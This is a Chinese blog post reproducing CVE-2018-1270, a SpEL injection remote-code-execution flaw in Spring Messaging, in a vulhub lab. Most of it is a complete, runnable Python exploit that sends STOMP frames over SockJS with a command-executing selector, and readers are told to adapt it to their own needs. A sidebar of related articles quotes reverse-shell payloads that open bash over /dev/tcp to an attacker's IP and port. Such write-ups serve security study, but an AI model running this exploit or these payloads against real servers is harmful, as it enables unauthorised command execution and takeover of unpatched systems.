Spring Messaging 远程命令执行漏洞(CVE-2018-1270)——漏洞复现

已于 2023-11-28 17:06:26 修改
阅读量256 收藏
点赞数
文章标签: 安全
于 2023-11-28 17:05:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42090431/article/details/134671752
版权
1、启动环境

2、漏洞复现

网上大部分文章都说spring messaging是基于websocket通信,其实不然。spring messaging是基于sockjs(可以理解为一个通信协议),而sockjs适配多种浏览器:现代浏览器中使用websocket通信,老式浏览器中使用ajax通信。

连接后端服务器的流程,可以理解为:

1. 用[STOMP协议](http://jmesnil.net/stomp-websocket/doc/)将数据组合成一个文本流
2. 用[sockjs协议](https://github.com/sockjs/sockjs-client)发送文本流,sockjs会选择一个合适的通道:websocket或xhr(http),与后端通信

所以我们可以使用http来复现漏洞,称之为“降维打击”。

exploit.py()

(需要用python3.6执行),因为该漏洞是订阅的时候插入SpEL表达式,而对方向这个订阅发送消息时才会触发,所以我们需要指定的信息有:

1. 基础地址,在vulhub中为`http://your-ip:8080/gs-guide-websocket`
2. 待执行的SpEL表达式,如`T(java.lang.Runtime).getRuntime().exec('touch /tmp/success')`
3. 某一个订阅的地址,如vulhub中为:`/topic/greetings`
4. 如何触发这个订阅,即如何让后端向这个订阅发送消息。在vulhub中,我们向`/app/hello`发送一个包含name的json,即可触发这个事件。当然在实战中就不同了,所以这个poc并不具有通用性。

根据你自己的需求修改POC。如果是vulhub环境,你只需修改其中的url即可。

#!/usr/bin/env python3
import requests
import random
import string
import time
import threading
import logging
import sys
import json

logging.basicConfig(stream=sys.stdout, level=logging.INFO)

def random_str(length):
    letters = string.ascii_lowercase + string.digits
    return ''.join(random.choice(letters) for c in range(length))


class SockJS(threading.Thread):
    def __init__(self, url, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.base = f'{url}/{random.randint(0, 1000)}/{random_str(8)}'
        self.daemon = True
        self.session = requests.session()
        self.session.headers = {
            'Referer': url,
            'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'
        }
        self.t = int(time.time()*1000)

    def run(self):
        url = f'{self.base}/htmlfile?c=_jp.vulhub'
        response = self.session.get(url, stream=True)
        for line in response.iter_lines():
            time.sleep(0.5)
    
    def send(self, command, headers, body=''):
        data = [command.upper(), '\n']

        data.append('\n'.join([f'{k}:{v}' for k, v in headers.items()]))
        
        data.append('\n\n')
        data.append(body)
        data.append('\x00')
        data = json.dumps([''.join(data)])

        response = self.session.post(f'{self.base}/xhr_send?t={self.t}', data=data)
        if response.status_code != 204:
            logging.info(f"send '{command}' data error.")
        else:
            logging.info(f"send '{command}' data success.")

    def __del__(self):
        self.session.close()


sockjs = SockJS('http://你自己的IP:8080/gs-guide-websocket')
sockjs.start()
time.sleep(1)

sockjs.send('connect', {
    'accept-version': '1.1,1.0',
    'heart-beat': '10000,10000'
})
sockjs.send('subscribe', {
    'selector': "T(java.lang.Runtime).getRuntime().exec('touch /tmp/success')",
    'id': 'sub-0',
    'destination': '/topic/greetings'
})

data = json.dumps({'name': 'vulhub'})
sockjs.send('send', {
    'content-length': len(data),
    'destination': '/app/hello'
}, data)

进入容器`docker-compose exec spring bash`,可见`/tmp/success`已成功创建:

Sarahie
关注
复现CVE-2018-1270——Spring Messaging 远程命令执行漏洞
记录并分享学习安全的知识点..
01-17 780
一、漏洞概述 spring messagingspring框架提供消息支持,其上层协议是STOMP,底层通信基于SockJS,在spring messaging中,其允许客户端订阅消息,并使用selector过滤消息。selector用SpEL表达式编写,并使用StandardEvaluationContext解析,造成命令执行漏洞。 二、漏洞复现 发现页面如下: exp如下: x.x.x.x/gs-guide-websocket 我是用dnslog验证的: 用我的方法poc如..
[JAVA安全]Spring MessagingCVE-2018-1270
snowlyzz的博客
02-19 915
SpEL注入漏洞
spring-messaging远程代码执行漏洞CVE-2018-1270复现
玄道的网安博客
01-07 1544
漏洞概述 Spring框架中通过spring-messaging模块来实现STOMP(Simple Text-Orientated Messaging Protocol),STOMP是一种封装WebSocket的简单消息协议。攻击者可以通过建立WebSocket连接并发送一条消息造成远程代码执行 影响版本 Spring Framework 5.0 to 5.0.4 Spring Framework 4.3 to 4.3.14 环境搭建 拉取环境 docker ...
Spring Messaging 远程代码执行漏洞分析(CVE-2018-1270
mole_exp的博客
02-26 8395
Spring Messaging 远程代码执行漏洞分析(CVE-2018-1270
Spring-Messaging远程代码执行漏洞CVE-2018-1270
m0_65150886的博客
12-27 1310
'selector': 'T(java.lang.Runtime).getRuntime().exec(new String[]{"/bin/bash","-c","exec 5/dev/tcp/你的kaliIP/kali监听端口;sockjs = SockJS('http://你的靶机IP:8080/gs-guide-websocket')
spring常见漏洞(4)
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
01-17 853
Spring Messaging 命令执行漏洞(CVE-2018-1270),Spring框架中的模块提供了一种基于WebSocket的STOMP协议实现,STOMP消息代理在处理客户端消息时存在SpEL表达式注入漏洞,攻击者可以通过构造恶意的消息来实现远程代码执行
Spring RCE漏洞分析1(CVE-2018-1270
hldfight
05-04 8292
0x00 前言 趁着五一休息,分析了一下Spring的历史漏洞,这里记录一下对Spring-Messaging远程代码执行漏洞CVE-2018-1270)的分析。该漏洞涉及到如下概念: 1、WebSocket协议,是HTML5提供的一种可在单个TCP连接上进行全双工通讯的协议。即允许服务端主动向客户端推送数据,详情可以参考这里,讲的挺好的。 2、SockJS,一个JavaScript库,它在浏览...
【网络安全Spring框架漏洞总结(二)
qq_44005305的博客
01-06 729
Spring Web Flow是Spring的一个子项目,主要目的是解决跨越多个请求的、用户与服务器之间的、有状态交互问题,提供了描述业务流程的抽象能力。Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行
漏洞复现Spring CVE-2016-4977/CVE-2017-4971/CVE-2017-8046/CVE-2018-1270/CVE-2018-1273
weixin_45556536的博客
12-24 1372
CVE-2017-4971 // 注意反弹的端口和IP修改,反弹语句需要url编码 &_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=vulhub
WebLogic 反序列化远程代码执行漏洞(CVE-2018-2628)漏洞复现
lc0813的博客
04-13 1516
漏洞概述: 在 WebLogic 里,攻击者利用其他rmi绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成反序列化远程代码执行漏洞,该漏洞主要由于T3服务触发,所有开放weblogic控制台7001端口,默认会开启T3服务,攻击者发送构造好的T3协议数据,就可以获取目标服务器的权限。 名词概念: 序列化:序列化 (Serialization)是将对象的状态...
spring-framework-5.0.5.RELEASE 漏洞修复
04-11
漏洞详情: spring-messaging模块远程代码执行CVE-2018-1270) STOMP(Simple Text Orientated Messaging Protocol)全称为简单文本定向消息协议,它允许STOMP客户端与任意STOMP消息代理(Broker)进行交互。Spring框架中的spring-messaging模块提供了一种基于WebSocket的STOMP协议实现,STOMP消息代理在处理客户端消息时存在SpEL表达式注入漏洞,因此攻击者可以通过构造恶意的消息来实现远程代码执行。 Windows平台Spring MVC框架目录遍历(CVE-2018-1271) Spring MVC框架支持配置静态资源文件(例如CSS、JS、图片等)访问,当静态文件存储在Windows平台的文件系统时,攻击者可以通过构造一个恶意的URL来实现目录遍历攻击。 Spring框架Multipart内容污染(CVE-2018-1272) 当使用Spring MVC或Spring WebFlux框架的应用收到一个客户端请求,并用它来向另一个服务端发送multipart请求时,攻击者可利用该漏洞往里插入恶意内容。该漏洞的利用有一定的限制,要求攻击者能够猜到multipart字段的boundary值,因此影响较低。
探索CaledoniaProject's CVE-2018-1270: 安全研究与学习的宝贵资源
最新发布
gitblog_00074的博客
03-31 294
探索CaledoniaProject's CVE-2018-1270: 安全研究与学习的宝贵资源 项目地址:https://gitcode.com/CaledoniaProject/CVE-2018-1270 项目简介 CVE-2018-1270是由CaledoniaProject维护的一个开源项目,主要关注的是2018年发现的安全漏洞。这个项目为开发者和安全研究人员提供了一个深入理解、学习和研究...
记一次曲折的CVE-2018-1270复现分析
蚁景网安学院
04-02 2694
前两天接到朋友对某个授权目标的漏扫结果,也算是初次接触到这个漏洞,就想着顺手分析一下复现一下,因为分析这个漏洞的文章也比较少,所以刚开始比较迷,进度也比较慢。
Spring Messaging 远程命令执行漏洞 CVE-2018-1270 漏洞复现
ADummy的博客
03-02 1183
Spring Messaging 远程命令执行漏洞CVE-2018-1270) by ADummy 0x00利用路线 ​ 订阅的时候插入SpEL表达式—>向此订阅发送消息—>触发命令执行 0x01漏洞介绍 ​ STOMP(Simple Text Orientated Messaging Protocol)全称为简单文本定向消息协议,它是一种在客户端与中转服务端(消息代理Broker)之间进行异步消息传输的简单通用协议,它定义了服务端与客户端之间的格式化文本传输方式。已经在被许多消息中间
CVE-2018-1270CVE-2018-1273:Spring Expression Language 漏洞分析
qq_22655689的博客
04-12 1465
0x00 背景     最近Spring框架不大太平,接连爆出来多个RCE远程代码执行CVE漏洞,其中有CVE-2018-1270CVE-2018-1273,通过对造成漏洞部分代码进行分析,发现都是因为滥用SpEL的StandardEvaluationContext。   0x01 漏洞影响 攻击者可以在未获得授权的情况下,将精心制作的请求参数注入到存在该漏洞的服务器上,从而发起...
权限绕过漏洞
rane的博客
04-01 2271
目录水平越权案例漏洞原理分析测试实例防御方案 靶场:https://github.com/zhuifengshaonianhanlu/pikachu 搭建方法和sqli-labs相同 水平越权案例 A和B属于同一级别用户,但各自不能操作对方个人信息。A如果越权操作B用户个人信息的情况称为水平越权操作,通过水平越权漏洞实现修改或删除其他用户的个人信息 随机登录一个用户,点击查看个人信息,此处用的是v...
SpringMessaging命令执行漏洞 cve-2018-1270
whatday的专栏
07-07 2334
漏洞概述 https://pivotal.io/security/cve-2018-1270 STOMP(Simple Text Orientated Messaging Protocol)全称为简单文本定向消息协议,它是一种在客户端与中转服务端(消息代理Broker)之间进行异步消息传输的简单通用协议,它定义了服务端与客户端之间的格式化文本传输方式。已经在被许多消息中间件与客户端工具所支持。STOMP协议规范:https://stomp.github.io/stomp-specification-1.
【vulhub】Spring Messaging 远程命令执行漏洞CVE-2018-1270漏洞验证与getshell
qq_45300786的博客
08-01 795
利用条件 影响范围 Spring Framework 5.0 to 5.0.4. Spring Framework 4.3 to 4.3.14 已不支持的旧版本仍然受影响 详细过程请看 Spring Messaging 远程命令执行漏洞CVE-2018-1270) 对反弹shell的POC进行base64编码(java反弹shell都需要先编码,不然不会成功,原因貌似是runtime不支持管道符) bash -i >& /dev/tcp/192.168.100.23/9090 0>&a
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值